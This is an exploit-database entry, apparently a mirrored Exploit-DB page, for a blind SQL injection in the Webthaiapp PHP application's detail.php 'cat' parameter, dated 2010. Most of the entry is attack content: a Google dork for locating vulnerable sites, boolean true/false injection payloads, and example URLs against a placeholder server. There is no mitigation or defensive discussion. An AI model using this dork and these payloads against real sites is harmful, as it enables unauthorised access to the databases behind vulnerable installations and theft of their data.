[] NeoSense
E X P L O I T S
title author type platform port cve id

Webthaiapp - 'detail.php?cat' Blind SQL Injection

Author: Xelenonz
type: webapps
platform: php
port: 
date_added: 2010-04-29 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
--==+==================================================+==--

--==+             Webthaiapp detail.php(cat) Blind Sql injection Vulnerability                +==--

--==+==================================================+==--

Date : 30-04-2010

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

AUTHOR: Xelenonz

Homepage : www.thaishadow.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Application : Webthaiapp

Vendor      : http://www.Webthaiapp.com/

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

DORK (google): "inurl:catalog/product/detail.php?cat="

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

DESCRIPTION:

EXPLOITS:

detail.php?cat=[valid catid]+and+1=1   << TRUE

detail.php?cat=[valid catid]+and+1=2  << False

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Example

http://server/catalog/product/detail.php?cat=44+and+1=1
<< True

http://server/catalog/product/detail.php?cat=44+and+1=2
<< False

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Special Thx : Krit admin@thaishadow,Thaishadow.com

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.